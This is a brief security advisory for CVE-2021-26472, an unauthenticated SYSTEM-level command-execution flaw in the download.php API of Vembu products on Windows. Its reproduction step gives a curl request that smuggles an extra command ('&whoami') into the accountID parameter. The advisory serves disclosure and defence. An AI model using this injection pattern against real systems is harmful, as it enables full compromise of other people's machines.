CVE-2021-26472 - Unauthenticated remote command execution with SYSTEM privileges in Vembu products
|Page author||Frank Breedijk|
|CVSS Base Score|
On a Windows system the API located at /consumerweb/secure/download.php allows an attacker to execute arbitrary commands with SYSTEM privileges
How to reproduce
Step 1: Install a vulnerable product on Windows
Step 2: execute the following http request
$ curl 'http://local/consumerweb/secure/download.php?Action=ResellerTemplate&accountID=%26whoami'
Step 3: Result
This vulnerability allows an attacker to execute arbitrary windows commands with full system privileges. A.k.a. a full system compromise.